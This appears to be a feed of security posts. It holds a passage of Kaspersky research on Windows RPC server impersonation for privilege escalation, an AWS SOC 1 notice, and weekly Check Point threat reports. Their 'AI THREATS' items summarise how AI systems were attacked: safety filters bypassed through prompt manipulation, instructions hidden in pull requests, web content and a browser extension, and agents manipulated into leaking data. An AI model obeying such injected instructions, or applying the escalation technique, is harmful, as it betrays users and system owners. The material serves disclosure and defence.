    After observing that Remote Desktop was disabled by default, I extended this idea by disabling additional services one by one and repeating the previous steps. This approach can reveal RPC clients that attempt to connect to services that are no longer available.

Additional privilege escalation paths

After running the logging and monitoring framework described earlier, I identified four additional scenarios that can lead to privilege escalation. The following sections introduce each case and explain how escalation can be achieved.

User interaction: From Edge to RDP

Microsoft Edge (msedge.exe) comes preinstalled on Windows systems. During startup, Edge triggers an RPC call to TermService. This RPC call is performed with a high impersonation level.

As previously discussed, Terminal Service is disabled by default. Because of this, the expected RPC server is unavailable, creating an opportunity for the attack scenario illustrated below.

The attack follows the same initial assumption as before: the attacker has already compromised a process running under the Network Service account. From there, they deploy the same malicious RPC server that mimics the legitimate TermService RPC interface.

However, unlike the previous scenario where the attacker coerced the Group Policy service, no coercion is required this time. Instead, the attacker simply waits for a high-privileged user, such as an administrator, to launch msedge.exe.

When Edge starts, it triggers the RPC client to attempt communication with the expected TermService RPC interface. Because the legitimate server is not running, the request is received by the attacker’s fake RPC server. Since the RPC call is made with a high impersonation level, the malicious server can call RpcImpersonateClient to impersonate the client process.

As a result, the attacker is able to impersonate the administrator-level client and escalate privileges from Network Service to Administrator.

Background services: From WDI to RDP

Some background Windows services periodically attempt to make RPC calls to the RDP service without user interaction. One such service is the WdiSystemHost service. The Diagnostic System Host Service (WDI) is a built-in Windows service that runs system diagnostics and performs troubleshooting tasks. This service runs under the SYSTEM account.

During normal operation, WDI periodically performs background RPC calls to the Remote Desktop service (TermService) using a high impersonation level. These RPC interactions occur automatically every 5–15 minutes and do not require any user input.

This behavior can be abused in a similar manner to the previous attack scenarios, as illustrated in the figure below.

In this case, however, no user interaction or coercion is required. After deploying a malicious RPC server that mimics the expected TermService RPC interface, the attacker only needs to wait for the WDI service to perform its periodic RPC call. Because the request is made with a high impersonation level, the malicious server can invoke RpcImpersonateClient and impersonate the calling process. This enables the attacker to escalate privileges to SYSTEM.

Abusing the Local Service account: From ipconfig to DHCP

Another scenario involves the DHCP Client service, which manages DHCP client operations on Windows systems. This service runs under the Local Service account and is enabled by default.

The DHCP Client service exposes an RPC server with multiple interfaces and endpoints. These interfaces are frequently invoked by various system DLLs, often using a high impersonation level.

In this scenario, instead of compromising a process running under Network Service, it is assumed the attacker has compromised a process running under the Local Service account. I also assume that the DHCP Client service is disabled, meaning the legitimate RPC server is unavailable.

As the figure below illustrates, the attacker can leverage this situation to escalate privileges.

After gaining control of a Local Service process, the attacker deploys a malicious RPC server that mimics the legitimate RPC server normally exposed by the DHCP Client service. Once the malicious server is running, the attacker waits for a high-privileged user, such as an administrator, to execute ipconfig.exe.

When ipconfig is run, it internally triggers an RPC request to the DHCP Client service. Since the legitimate RPC server is not running, the request is received by the attacker’s fake RPC server. Because the RPC call is performed with a high impersonation level, the malicious server can call RpcImpersonateClient to impersonate the client.

As a result, the attacker can escalate privileges from the Local Service account to the Administrator account.

Abusing Time

The Windows Time service (W32Time) is responsible for maintaining date and time synchronization across systems in a Windows environment. This service is enabled by default and runs under the Local Service account.

The service exposes an RPC server with two endpoints:

  • \PIPE\W32TIME_ALT
  • \RPC Control\W32TIME_ALT

The executable C:\Windows\System32\w32tm.exe interacts with the Windows Time service through RPC. However, before connecting to the valid RPC endpoints exposed by the service, the executable first attempts to access the nonexistent named pipe: \PIPE\W32TIME. This named pipe is not exposed by the legitimate W32Time service. However, if this endpoint were available, w32tm.exe would attempt to connect to it.

An attacker can abuse this behavior by deploying a malicious RPC server that mimics the legitimate RPC interface of the Windows Time service. Rather than exposing the legitimate endpoints, the attacker’s server exposes the nonexistent endpoint \PIPE\W32TIME, as shown in the figure below.

As in the previous scenarios, it is assumed the attacker has already compromised a process running under the Local Service account. The attacker then deploys a fake RPC server that implements the same RPC interface as the Windows Time service, but which exposes the alternative endpoint used by w32tm.exe.

Once the malicious server is running, the attacker simply waits for a high-privileged user, such as an administrator, to execute w32tm.exe. When the executable runs, it attempts to connect to the endpoint \PIPE\W32TIME. Because the attacker’s fake server exposes this endpoint, the RPC request is directed to the malicious server.

Since the RPC call is performed with a high impersonation level, the malicious server can impersonate the calling client. As a result, the attacker can escalate privileges from the Local Service account to the Administrator account.

In this scenario, it is important to note that the legitimate Windows Time service does not need to be disabled. Because the executable attempts to connect to a nonexistent endpoint, it is sufficient for the attacker to expose that endpoint through the malicious RPC server.

Vulnerability disclosure

After discovering the vulnerability, Kaspersky Security Services prepared a 10-page technical report describing the issue and the various aforementioned exploitation scenarios. The report was submitted to the Microsoft Security Response Center (MSRC) to report the vulnerability and request a fix.

Twenty days later, Microsoft responded, indicating that they did not classify the vulnerability as high severity. According to their assessment, the issue was classified as moderate severity and would therefore not be patched immediately. No CVE would be assigned, and the case would be closed without further tracking.

Microsoft explained that the moderate severity classification was due to the requirement that the originating process had to already possess the SeImpersonatePrivilege privilege. Since this privilege was typically required for the attack to succeed, Microsoft determined that the issue did not require immediate remediation.

Kaspersky Security Services respect Microsoft’s assessment and only published the research after the embargo period ends. In line with the coordinated vulnerability disclosure policy, Kaspersky Security Services will refrain from publishing detailed instructions that could enable or accelerate mass exploitation.

The disclosure timeline is shown below:

  • 2025-09-19: Vulnerability reported to Microsoft Security Response Center (Case 101749).
  • 2025-10-10: MSRC response – the case was assessed as moderate severity, not eligible for a bounty, no CVE was issued, and the case was closed without further tracking.
  • 2026-04-24: expected whitepaper publication date.

Detection and defense

As discussed above, this vulnerability is related to an architectural design behavior. Fully preventing it would require Microsoft to release a patch that addresses the underlying issue.

Nevertheless, organizations can still take steps to detect and mitigate potential abuse. ETW-based monitoring within the framework described above enables defenders to identify RPC exceptions in their environment, especially when RPC clients attempt to connect to unavailable servers.

I have provide the tools used in the previously described framework so that organizations can check their environment for such behavior. You can find all of them in the research repository.

By monitoring these events, administrators can identify situations where legitimate RPC servers are expected but not running. In some cases, the attack surface may be reduced by enabling the corresponding services, ensuring that the legitimate RPC server is available. This can hinder attackers from deploying malicious RPC servers that imitate legitimate endpoints.

It is also good practice to reduce the use of the SeImpersonatePrivilege privilege in processes where it is not required. Some system processes need this privilege for normal operations. However, granting it to custom processes is generally not considered good security practice.

Conclusion

All the exploits described in this research were tested on Windows Server 2022 and Windows Server 2025 with the latest available updates prior to the submission date. The proof-of-concept implementations can be found in the research repository. However, it is highly likely that this issue may also be exploitable on other Windows versions.

Because the vulnerability stems from an architectural design issue, there may be additional attack scenarios beyond those presented in this research. The exact exploitation paths may vary from one system to another depending on factors such as installed software, the DLLs involved in RPC communication, and the availability of corresponding RPC servers.

  •  

Winter 2025 SOC 1 report is now available with 184 services in scope

Amazon Web Services (AWS) is pleased to announce that the Winter 2025 System and Organization Controls (SOC) 1 report is now available. The report covers 184 services over the 12-month period from January 1, 2025 – December 31, 2025, giving customers a full year of assurance. This report demonstrates our continuous commitment to adhering to the heightened expectations of cloud service providers.

Customers can download the Winter 2025 SOC 1 report through AWS Artifact, a self-service portal for on-demand access to AWS compliance reports. Sign in to AWS Artifact in the AWS Management Console, or learn more at Getting Started with AWS Artifact.

AWS strives to continuously bring services into the scope of its compliance programs to help customers meet their architectural and regulatory needs. You can view the current list of services in scope on our Services in Scope page. As an AWS customer, you can reach out to your AWS account team if you have any questions or feedback about SOC compliance.

To learn more about AWS compliance and security programs, see AWS Compliance Programs. As always, we value feedback and questions; reach out to the AWS Compliance team through the Contact Us page.

If you have feedback about this post, submit comments in the Comments section below.

Tushar Jain

Tushar Jain
Tushar is a Compliance Program Manager at AWS where he leads multiple security and privacy initiatives Tushar holds a Master of Business Administration from Indian Institute of Management Shillong, India and a Bachelor of Technology in electronics and telecommunication engineering from Marathwada University, India. He has over 14 years of experience in information security and holds CISM, CCSK and CSXF certifications.

Michael Murphy

Michael Murphy
Michael is a Compliance Program Manager at AWS where he leads multiple security and privacy initiatives. Michael has over 14 years of experience in information security and holds a master’s degree and a bachelor’s degree in computer engineering from Stevens Institute of Technology. He also holds CISSP, CRISC, CISA, and CISM certifications.

Atulsing Patil

Atulsing Patil
Atulsing is a Compliance Program Manager at AWS and has over 28 years of consulting experience in information technology and information security management. Atulsing holds a Master of Science in Electronics degree and professional certifications such as CCSP, CISSP, CISM, CDPSE, ISO 42001 Lead Auditor, ISO 27001 Lead Auditor, HITRUST CSF, Archer Certified Consultant, and AWS CCP.

Nathan Samuel

Nathan Samuel
Nathan is a Compliance Program Manager at AWS where he leads multiple security and privacy initiatives. Nathan has a Bachelor of Commerce degree from the University of the Witwatersrand, South Africa, and has over 21 years of experience in security assurance. He holds the CISA, CRISC, CGEIT, CISM, CDPSE, and Certified Internal Auditor certifications.

Jeff Cheung

Jeff Cheung
Jeff is a Compliance Program Manager at AWS where he leads multiple security and privacy initiatives across business lines. Jeff has Bachelors degrees in Information Systems, and Economics from SUNY Stony Brook, and has over 20 years of experience in information security and assurance. Jeff has held professional certifications such as CISA, CISM, and PCI-QSA.

Noah Miller

Noah Miller
Noah is a Compliance Program Manager at AWS and leads multiple security and privacy initiatives. Noah has 7 years of experience in information security. He has a master’s degree in Cybersecurity Risk Management and a bachelor’s degree in Informatics from Indiana University.

Will Black Will Black
Will is a Compliance Program Manager at Amazon Web Services where he leads multiple security and compliance initiatives. Will has 10 years of experience in compliance and security assurance and holds a degree in Management Information Systems from Temple University. Additionally, he is a PCI Internal Security Assessor (ISA) for AWS and holds the CCSK and ISO 27001 Lead Implementer certifications.
Allen Beam Allen Beam
Allen is a Compliance Program Manager at Amazon Web Services supporting third-party security and privacy compliance initiatives. He has over 10 years of experience in external IT security audits, security control design and implementation, and audit readiness and control deficiency remediation. He has a Bachelor’s Degree in Economics and Finance from James Madison University.
Ziv Wand Ziv Wand
Ziv is a Compliance Program Manager at AWS and leads multiple security and privacy initiatives. Ziv has over 6 years of experience in information security assurance, external IT security audits, security control design and implementation, and audit readiness. He holds a Bachelor of Science in Management Information Systems from Binghamton University.
Shalini Mishra Shalini Mishra
Shalini is a Compliance Program Manager at AWS. She has over 5 years of experience leading end-to-end compliance programs across ISO, SOC, and cloud security frameworks, with deep expertise in third-party risk management and enterprise governance. Shalini holds a Master of Science degree in Information Systems and a CRISC certification.
  •  

20th April – Threat Intelligence Report

For the latest discoveries in cyber research for the week of 20th April, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • Booking.com, the Amsterdam-based travel platform, has confirmed a data breach after unauthorized parties accessed reservation data linked to some customers. Exposed information included names, email addresses, phone numbers, physical addresses, and booking details, creating phishing risk, while the company reset reservation PINs and notified affected users.
  • McGraw-Hill, a global educational publisher, has disclosed a data breach following an extortion attempt after attackers accessed its Salesforce environment. Leaked data from about 13.5 million accounts includes names, email addresses, phone numbers, and physical addresses, while no payment card information was reported exposed.
  • EssentialPlugin, a WordPress plugins development firm, has suffered a supply chain compromise that pushed malicious updates to more than 30 plugins installed on thousands of websites. The backdoored code enabled unauthorized access and spam page creation, and WordPress.org closed the affected plugins while infections may remain.
  • Basic-Fit, Europe’s largest gym chain, has reported a data breach after attackers accessed a franchise-wide system used to track club visits. The incident exposed bank account details and personal data for about one million members across six countries, while passwords and identity documents were not affected.

AI THREATS

  • Researchers unveiled that a lone hacker weaponized Claude Code and OpenAI’s GPT-4.1 to breach nine Mexican government agencies. AI-driven commands accelerated reconnaissance, issuing 5,317 actions across 34 sessions and accessing 195 million taxpayer records and 220 million civil records, after safety filters were bypassed through prompt manipulation and an injected hacking manual.
  • Researchers detailed a phishing campaign that impersonates Anthropic’s Claude AI with a fake Claude Pro installer for Windows. The package displays a working application to distract victims while abusing a trusted program to sideload PlugX malware, enabling remote access and persistence on compromised systems.
  • Researchers demonstrated a prompt injection technique that hijacks AI agents used in GitHub workflows from major vendors. Malicious instructions hidden in pull request titles or comments can make the agents run commands and expose repository secrets, including access tokens and API keys, during automated development tasks.

VULNERABILITIES AND PATCHES

  • CISA warns of active exploitation of Apache ActiveMQ vulnerability CVE-2026-34197, a high-severity code injection flaw that allows remote code execution. The vulnerability carries a CVSS score of 8.8 and has been addressed by Apache in versions 5.19.4 or 6.2.3.

Check Point IPS provides protection against this threat (Apache ActiveMQ Code Injection (CVE-2026-34197))

  • Splunk has released fixes for CVE-2026-20204, a high-severity vulnerability in Splunk Enterprise and Cloud Platform. The flaw can let a low-privileged user upload a malicious file to a temporary directory and achieve remote code execution, while two additional medium-severity issues were also addressed.
  • As part of its Patch Tuesday, Microsoft has patched CVE-2026-33825, one of three actively-exploited Microsoft Defender zero-days dubbed BlueHammer, RedSun, and UnDefend that were revealed by a security researcher. The vulnerabilities allow local privilege escalation as well as denial of service, and researchers said exploitation began in April after the vulnerabilities were revealed.
  • CISA has flagged the vulnerability CVE-2025-60710, a Windows Task Host privilege escalation flaw affecting Windows 11 and Windows Server 2025, as being actively exploited in attacks. The vulnerability allows a local attacker to gain SYSTEM privileges on a compromised device.

THREAT INTELLIGENCE REPORTS

  • Check Point Research have documented 2026 Q1 brand impersonation phishing focused on Microsoft, Apple, Google, and Amazon, which accounted for nearly half of observed attempts. The research shows attackers using lookalike subdomains, QR-based WhatsApp lures, and fake Adobe installers to steal credentials and compromise devices.
  • Researchers uncovered ZionSiphon, malware designed to target industrial control environments at water treatment and desalination facilities in Israel. The report says the code is configured for operational technology systems and reflects continued attacker interest in critical infrastructure, especially utilities with exposed or weakly defended networks.
  • Researchers identified more than 1,250 active command and control servers distributed across 165 Russian hosting providers between January and April 2026. The infrastructure supported malware campaigns involving traffic redirection systems, IoT botnets including Hajime, Mozi, and Mirai, and repurposed tools such as Cobalt Strike.
  • Researchers observed a fake “Ledger Live” app on Apple’s App Store that stole more than $9.5 million from over 50 cryptocurrency users within a week. The app harvested wallet credentials, drained funds across Bitcoin, Ethereum, Solana, Tron and XRP, and routed proceeds through KuCoin deposit addresses and the AudiA6 mixer, complicating recovery.

The post 20th April – Threat Intelligence Report appeared first on Check Point Research.

  •  

13th April – Threat Intelligence Report

For the latest discoveries in cyber research for the week of 13th April, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • The Los Angeles Police Department has reported a data breach involving a digital storage system used by the L.A. City Attorney’s Office. The exposure included 7.7 terabytes and more than 337,000 files, including personnel records, internal affairs material, and unredacted personal information.
  • ChipSoft, a Dutch healthcare software vendor whose HiX platform is used by hospitals across the Netherlands, has suffered a ransomware attack that forced it to disable patient and provider services. Multiple hospitals disconnected from its systems, disrupting operations, and the company warned that the threat actor may have gained unauthorized access to patient data.
  • Ransomware group Qilin has taken responsibility for a cyber-attack targeting German political party Die Linke, which forced the party to shut down its IT infrastructure in late March. The party said membership databases were unaffected, while Qilin threatens to leak stolen sensitive employee and party information.

Check Point Endpoint and Threat Emulation provide protection against these threats (Ransomware.Wins.Qilin*)

  • Bitcoin Depot, a US cryptocurrency ATM operator with more than 25,000 kiosks and checkout locations, has disclosed a cyberattack that allowed attackers to steal credentials tied to digital asset settlement accounts. The attackers transferred more than 50 BTC worth more than $3.6M from company-controlled wallets before access was blocked.

AI THREATS

  • Researchers identified GrafanaGhost, an attack against Grafana’s AI components that can silently exfiltrate enterprise data by chaining indirect prompt injection with image URL validation bypass. The technique can expose financial, infrastructure, and customer information in the background, and Grafana has already addressed the weakness.
  • Researchers outlined AI Agent Traps, a framework describing six web-based attack classes that can manipulate autonomous AI agents through malicious content. The methods can inject hidden instructions, poison reasoning, corrupt memory, and steer tool use, showing how web pages can turn agent workflows into attack surfaces.
  • Researchers measured a growing AI supply chain risk, finding that third-party API routers for AI models can hijack agent tool calls to alter commands and steal credentials. In testing, several routers injected malicious code, abused intercepted cloud keys, and even triggered wallet theft from a researcher environment.

VULNERABILITIES AND PATCHES

  • CISA warns of active exploitation of Ivanti CVE-2026-1340, a critical code injection flaw in Endpoint Manager Mobile that allows unauthenticated remote code execution and full compromise of affected servers. The vulnerability carries a CVSS score of 9.8, affects multiple 12.5 through 12.7 releases, and has been exploited in the wild.

Check Point IPS provides protection against this threat (Ivanti Endpoint Manager Mobile Code Injection (CVE-2026-1340))

  • Adobe Reader is affected by an actively exploited zero-day that uses malicious PDF files to invoke privileged features on fully updated systems, enabling local data theft. Researchers said the activity has run since at least December 2025, uses Russian-language oil and gas lures, and may also enable further compromise.
  • Marimo maintainers released a fix for CVE-2026-39987, a critical remote code execution flaw in the Marimo Python notebook that allowed attackers to open a terminal without authentication and run commands. Exploitation was observed within hours of disclosure against internet-exposed instances, and fixes are available in version 0.23.0.
  • Fortinet has fixed CVE-2026-35616, a critical improper access control flaw in FortiClient EMS that enables unauthenticated code or command execution through crafted requests. The issue been actively exploited in the wild, prompting Fortinet to release an emergency hotfix.

THREAT INTELLIGENCE REPORTS

  • Check Point Research have analyzed March 2026’s threat landscape, with organizations averaging 1,995 weekly attacks. Education remained the most targeted sector, ransomware rose to 672 incidents led by Qilin, Akira, and DragonForce, and GenAI exposure remained high across enterprise environments.
  • Researchers discovered a coordinated software supply chain campaign that planted 36 malicious npm packages impersonating Strapi plugins. The packages executed on installation to search for secrets, maintain command and control, and in some cases enable Redis remote code execution, credential harvesting, and direct PostgreSQL exploitation.
  • Researchers linked Storm-1175, a financially motivated group associated with Medusa ransomware, to high-velocity exploitation of n-day and zero-day flaws. Microsoft said the actor moves quickly from initial access to data theft and ransomware deployment, sometimes weaponizing vulnerabilities within a day and heavily impacting healthcare, education, finance, and services.
  • Researchers identified a hack-for-hire campaign linked to BITTER APT that targeted journalists, activists, and government figures across the Middle East and North Africa. The operators used phishing to access iCloud backups and Signal accounts, and deployed Android spyware disguised as messaging applications to take over victim devices.

The post 13th April – Threat Intelligence Report appeared first on Check Point Research.

  •  

6th April – Threat Intelligence Report

For the latest discoveries in cyber research for the week of 30th March, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • The European Commission, the European Union’s executive body, has confirmed a data breach after its Europa.eu platform was compromised through a third-party exchange linked to the Trivy supply chain attack. The incident affected at least one Amazon Web Services account and resulted in data theft, while websites and internal systems remained operational.
  • Global toys and games manufacturing giant Hasbro has disclosed a cyberattack after detecting unauthorized access to its network on March 28. Some systems were taken offline, and the company warned that recovery could take weeks and cause delays.
  • Cryptocurrency trading platform Drift Protocol on Solana has suffered a major breach after an attacker gained enough Security Council approvals to execute pre-signed transactions on April 1. Drift said roughly $280 million was affected, froze platform activity, and stated the incident did not involve a smart contract flaw or seed phrase compromise.
  • Luxury camping providers Roan and Eurocamp have experienced a data breach that exposed guest names, email addresses, phone numbers, travel destinations, booking dates, and prices. Attackers are using the stolen data in WhatsApp payment scams, while the companies said the flaw was patched and no passwords or payment data were taken.

AI THREATS

  • Check Point Research demonstrated a hidden outbound channel in ChatGPT’s execution runtime that enabled silent exfiltration of user data. A single malicious prompt or a backdoored GPT could transmit chat content and uploaded files to attackers through DNS.
  • Check Point warns that based on leaked details about Anthropic’s Claude “Mythos”, the model will likely accelerate vulnerability discovery, exploit development, and multi-step attack automation. The new capabilities could sharply reduce time to exploit and make advanced offensive techniques more broadly accessible.
  • Researchers examined six AI agents and found that impersonation and fabricated urgency can push them to disclose data or take harmful actions. In testing, an agent forwarded 124 emails containing personal and financial details, while others deleted files and reassigned admin access.
  • Researchers observed a flaw in Google Cloud’s Vertex AI Agent Engine that could let attackers extract service agent credentials and pivot into customer projects. The exposed privileges enabled access to storage and Artifact Registry resources, and permissive OAuth scopes also increased the risk of wider Google Workspace exposure.

VULNERABILITIES AND PATCHES

  • Cisco released urgent fixes for CVE-2026-20093, a critical authentication bypass in its Integrated Management Controller software used across ENCS 5000, Catalyst 8300 uCPE, and UCS C-Series M5 and M6 servers. Remote attackers can reset any account, including Admin, allowing full device takeover.
  • Researchers discovered CVE-2026-5281, a zero-day memory flaw in Chrome’s WebGPU component, Dawn, that also impacts Edge, Brave, Opera, and other Chromium-based browsers. The vulnerability is being actively exploited and can enable code execution on user systems, prompting inclusion in CISA’s Known Exploited Vulnerabilities catalog.
  • Progress has addressed two critical ShareFile vulnerabilities, including CVE-2026-2699 with a CVSS score of 9.8, that can be chained for unauthenticated remote code execution. The flaws let attackers reach restricted configuration pages and upload arbitrary files to the server without logging in to affected installations.
  • F5 reclassified CVE-2025-53521, a BIG-IP Access Policy Manager vulnerability, as a critical remote code execution flaw under active exploitation. More than 14,000 internet-exposed systems were still visible online, and the company published indicators of compromise and rebuild guidance for affected devices.

THREAT INTELLIGENCE REPORTS

  • Check Point Research has unmasked TrueChaos, a campaign exploiting a 0-day vulnerability (CVE-2026-3502) in TrueConf’s on-premises update process to push malicious updates to Southeast Asian government networks. Attackers delivered Havoc payloads through trusted servers, and the activity was assessed with moderate confidence as being affiliated with a Chinese nexus.
  • Check Point Research have outlined an Iran-nexus password-spraying campaign against Microsoft 365 in the Middle East, conducted in three waves during March. The activity focused on Israel and the UAE, targeting municipalities and using Tor and VPN infrastructure to evade geofencing and complicate attribution.
  • Check Point Research have uncovered coordinated tax-season phishing and malware activity, with hundreds of newly registered tax-themed domains and rising risk levels. In March 2026, one in ten new domains was flagged as risky, while IRS-impersonating sites harvested personal data and Spain-themed emails delivered malware loaders.
  • Researchers documented a supply chain compromise of the Axios npm package, a widely used HTTP client with millions of monthly downloads, that briefly pushed malicious releases delivering a remote access trojan. The tampered versions used a hidden dependency to fetch a second-stage payload and erase traces after installation.

The post 6th April – Threat Intelligence Report appeared first on Check Point Research.

  •  

30th March – Threat Intelligence Report

For the latest discoveries in cyber research for the week of 30th March, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • Iranian state-affiliated threat group Handala Hack has breached FBI director’s Patel’s personal Gmail account and leaked many personal photos and documents. This follows the FBI’s seizure of domains related to Handala Hack’s activity last week, due to the group’s sustained targeting of Israeli and American entities, which increased during the ongoing Iran conflict.
  • Spain’s Port of Vigo in Galicia has suffered a ransomware attack that forced officials to disconnect parts of its network and switch cargo handling to manual processes. The incident locked equipment and disrupted digital logistics, while physical ship movement could continue without digital communication.
  • The Netherlands’ Ministry of Finance has confirmed a March 19 cyberattack that breached internal systems in its policy department and disrupted work for some employees. Authorities blocked access to affected environments, while tax, customs, and benefits services remained unaffected and no threat actor publicly claimed responsibility for the attack.
  • Decentralized finance platform Resolv has suffered a cyberattack after a compromised private key let an attacker mint about $80 million in uncollateralized USR tokens and swap them for 11,408 ETH worth $24.5 million. Resolv confirmed the incident, paused the app, and offered a 10% bounty for returned funds.

AI THREATS

  • Researchers demonstrated a supply chain compromise of LiteLLM, a Python library linking apps to major AI services, after attackers hijacked a security tool and pushed malicious releases on March 24. The tainted packages harvested API keys and cloud credentials, creating downstream exposure for widely used AI projects.
  • Researchers outlined three high-severity vulnerabilities in LangChain and LangGraph, open-source frameworks for building AI assistants, that could expose files, environment secrets, and prior conversations. The flaws enabled arbitrary file access, secret leakage, and SQL injection in checkpointing, and patches were issued in updated components.
  • Researchers identified a zero-click flaw in Anthropic’s Claude Chrome extension that let any website silently inject prompts and control the assistant. The attack combined an overly permissive trusted domain list with a scripting bug in Arkose Labs CAPTCHA handling, enabling token theft, chat access, and email actions.

VULNERABILITIES AND PATCHES

  • Cisco has addressed CVE-2026-20131, a CVSS 10 vulnerability in Secure Firewall Management Center that lets unauthenticated attackers execute code as root through the web interface. Cisco confirmed attempted exploitation in March 2026 and released fixes, while on-premises customers have no workaround beyond applying the updates.

Check Point IPS provides protection against this threat (Cisco Secure Firewall Management Center Insecure Deserialization (CVE-2026-20131))

  • TP-Link has issued firmware updates addressing CVE-2025-15517 and related critical flaws in Archer NX200, NX210, NX500, and NX600 5G Wi-Fi routers. Attackers could access administrative functions without logging in, upload rogue firmware, execute system commands, and more.
  • Citrix has released patches for CVE-2026-3055 and CVE-2026-4368 affecting NetScaler ADC and Gateway. The critical memory flaw can expose sensitive data in SAML Identity Provider deployments, while the second bug can mix up user sessions on gateways, creating confidentiality and access risks.

Check Point IPS provides protection against this threat (Citrix NetScaler Out Of Bounds Read (CVE-2026-3055))

  • Researchers warn that a leaked ‘DarkSword’ iOS exploit chain enables no-click attacks via Safari, threatening up to 270 million unpatched iPhones and iPads. The code eases copycat attacks and has seen use, while Apple issued fixes, including March 11 emergency updates for iOS 15 and 16.

THREAT INTELLIGENCE REPORTS

  • Researchers revealed that cybercriminals are abusing Keitaro, a commercial adtech tracker, to distribute phishing, scams, and malware at scale. Infoblox linked the platform to major malvertising and spam operations, including campaigns impersonating Canadian banks, logistics brands, government services, and high-trust retail providers.
  • Researchers analyzed three China-aligned activity clusters targeting a Southeast Asian government in a coordinated espionage operation. The campaign combined USB propagation, the Hypnosis loader, and the FluffyGh0st RAT, showing how distinct threat clusters can converge on one high-value government target with complementary tooling.
  • Researchers have analyzed the activity of Russian threat group APT28 (aka Fancy Bear). The group has recently targeted Ukraine as well as its European defense supply chain partners with a toolset dubbed PRIXMES, which holds both espionage and sabotage capabilities. APT28 exploited multiple vulnerabilities, including zero-days, in its attacks.
  • Researchers identified a coordinated adversary-in-the-middle phishing campaign targeting TikTok for Business users who sign in with Google. Attackers deployed proxy login pages that captured passwords and session cookies to bypass multi-factor authentication, with newly registered domains and Cloudflare-hosted infrastructure used to scale impersonation.

The post 30th March – Threat Intelligence Report appeared first on Check Point Research.

  •  

23rd March – Threat Intelligence Report

For the latest discoveries in cyber research for the week of 23rd March, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • Navia Benefit Solutions, a United States-based employee benefits administrator, has disclosed a breach affecting more than 2.6 million individuals after unauthorized access and potential data exfiltration occurred between December 22, 2025 and January 15, 2026. Exposed information may include personal, health, and benefits data.
  • Identity protection firm Aura was breached after a phone phishing attack let an intruder access an employee account and a marketing platform. The actor obtained about 900,000 records, mostly names and emails, while the core systems and identity protection services were not compromised.
  • Puerto Rico Aqueduct and Sewer Authority, which manages the territory’s water supply, has confirmed a cyberattack that exposed customer and employee information. The authority said critical infrastructure was not affected because network segmentation separated operational systems, limiting the incident to business data and administrative environments.
  • Intuitive, a United States-based robotic surgery company, has suffered a data breach after a targeted phishing incident led to a compromised employee account. Exposed information includes customer contact details, employee data, and corporate records, while the company said its da Vinci and Ion platforms were unaffected.

AI THREATS

  • Check Point Research highlighted the key developments and major trends in the AI threat ecosystem during January – February 2026. The report focuses on the transition to the agentic era by the threat actors, where development is shifting from simple prompting to structured workflows, attack chains are evolving from human-led to AI-led operations, and safeguard bypass techniques are increasingly beginning to exploit agent mechanisms.
  • Researchers have discovered three chained flaws in Anthropic’s Claude.ai, enabling invisible prompt injection, silent exfiltration of conversation history through the Files API, and redirection through an open redirect. Anthropic patched the injection issue and is addressing the remaining weaknesses, while the chain enables stealthy data theft.
  • Researchers have witnessed exploitation of CVE-2026-33017, a critical unauthenticated remote code execution flaw in Langflow, an open-source framework for AI agents and retrieval-augmented generation pipelines. Attackers weaponized the bug within 20 hours of disclosure, allowing arbitrary Python execution on exposed instances through a single crafted request.

Check Point IPS provides protection against this threat (Langflow Remote Code Execution (CVE-2026-33017))

VULNERABILITIES AND PATCHES

  • ConnectWise has patched CVE-2026-3564, a critical cryptographic signature verification flaw in ScreenConnect, its remote access platform used by managed service providers and IT teams. The issue could let attackers use extracted machine keys to authenticate sessions without authorization and gain elevated privileges on affected instances
  • Ubiquiti has addressed CVE-2026-22557, a maximum-severity flaw in the UniFi Network Application used to manage access points, switches, and gateways. The unauthenticated path traversal bug affects version 10.1.85 and earlier and can let attackers access files, compromise accounts, and potentially seize control of underlying systems.
  • Zimbra warns of active exploitation of CVE-2025-66376, a stored cross-site scripting flaw in Zimbra Collaboration Suite that was recently patched. Malicious emails can execute code when viewed in the Classic UI, exposing session cookies and mailbox data, while patched versions include 10.1.13 and 10.0.18, following warnings about real-world abuse.
  • GNU InetUtils telnetd is affected by CVE-2026-32746, a CVSS 9.8 remote code execution flaw impacting all versions up to 2.7. Attackers can trigger the issue with a single Telnet connection without logging in, potentially gaining root control on exposed Linux, IoT, and industrial systems before a patch arrives.

Check Point IPS provides protection against this threat (GNU inetutils Buffer Overflow (CVE-2026-32746))

THREAT INTELLIGENCE REPORTS

  • Check Point researchers have analyzed recent developments in the Telegram cybercrime scene, after the company had bolstered its moderation tools due to extensive criticism of allowing criminal behavior. Data shows that despite Telegram’s efforts, it is still the primary platform for cybercrime communication, with activity only growing.
  • Researchers identified an Interlock ransomware campaign exploiting CVE-2026-20131, a critical flaw in Cisco Secure Firewall Management Center that enables remote code execution. The group used the zero-day as early as January, several weeks before it was patched and publicly disclosed by Cisco.
  • Researchers revealed that two React Native npm packages, react-native-country-select and react-native-international-phone-number, were backdoored on March 16, 2026, in a coordinated supply-chain attack. A preinstall script deployed credential and crypto theft malware with persistence, while the packages recorded over 130,000 combined downloads over the previous month.
  • Researchers have published a threat assessment of MuddyWater, linking the Iranian APT group to spear-phishing and LampoRAT. The report details delivery infrastructure, command-and-control patterns, and victimology.

Check Point Harmony Endpoint and Threat Emulation provide protection against these threats

 

The post 23rd March – Threat Intelligence Report appeared first on Check Point Research.

  •  

16th March – Threat Intelligence Report

For the latest discoveries in cyber research for the week of 16th March, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • United States-based medical technology company Stryker has suffered a cyberattack that caused a global disruption to its environment. The company said its surgical robotics, clinical communications platform, and life support monitors are safe to use. Media reports said employee devices were factory reset across multiple locations worldwide. Iranian group Handala Hack has claimed responsibility for the attack and said it had exfiltrated large amounts of data as part of the attack.
  • Telus Digital, a subsidiary of Canadian telecom firm Telus, has confirmed a breach involving unauthorized access to a limited number of systems. Hacker group ShinyHunters claims to have stolen nearly one petabyte of customer and call data and demanded $65 million in ransom, although the company said it has not verified those claims and reported no disruption.
  • Encrypted messaging service Signal has experienced targeted phishing campaigns leading to account takeovers of high-profile users, including journalists and government officials. Signal said its infrastructure and encryption remain intact, and attackers tricked victims into sharing SMS verification codes and Signal PINs to provision new devices and impersonate them.
